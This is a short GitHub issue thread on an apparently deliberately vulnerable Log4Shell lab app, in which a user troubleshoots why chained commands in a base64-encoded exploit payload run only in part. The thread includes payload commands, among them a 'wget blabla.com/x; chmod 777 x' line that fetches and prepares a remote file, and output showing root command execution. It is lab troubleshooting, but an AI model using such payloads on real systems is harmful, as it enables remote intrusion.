log4shell-vulnerable-app

error..

Open scotch123 opened this issue 3 years ago • 4 comments

I'm trying to replicate the log4j environment, but when I execute the base64 payload, which is "uname -a;id", it only executes the second command: id. It doesn't execute both commands. Can you tell me why?

Thank you!

scotch123, Jan 19 '22 19:01

Not sure, have you tried uname -a && id?

christophetd, Jan 19 '22 23:01

Yes, I did. It doesn't matter what command I put. I can put "wget blabla.com/x; chmod 777 x", but it doesn't take both commands, only one of them. Any idea why? The log seems to be OK. But if I put 2 commands with ; or && between them, it doesn't work :ss. I've been trying to fix this for 3 hours and still nothing. :-s

scotch123, Jan 19 '22 23:01

Here is an example:

scotch123, Jan 19 '22 23:01

echo "uname -a && id >/tmp/bla" |base64 ... Here is the reply:

~# docker exec -it 6e31c19206a0 sh
/ # cat /tmp/bla
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ #

Uname comments is missing..

scotch123, Jan 19 '22 23:01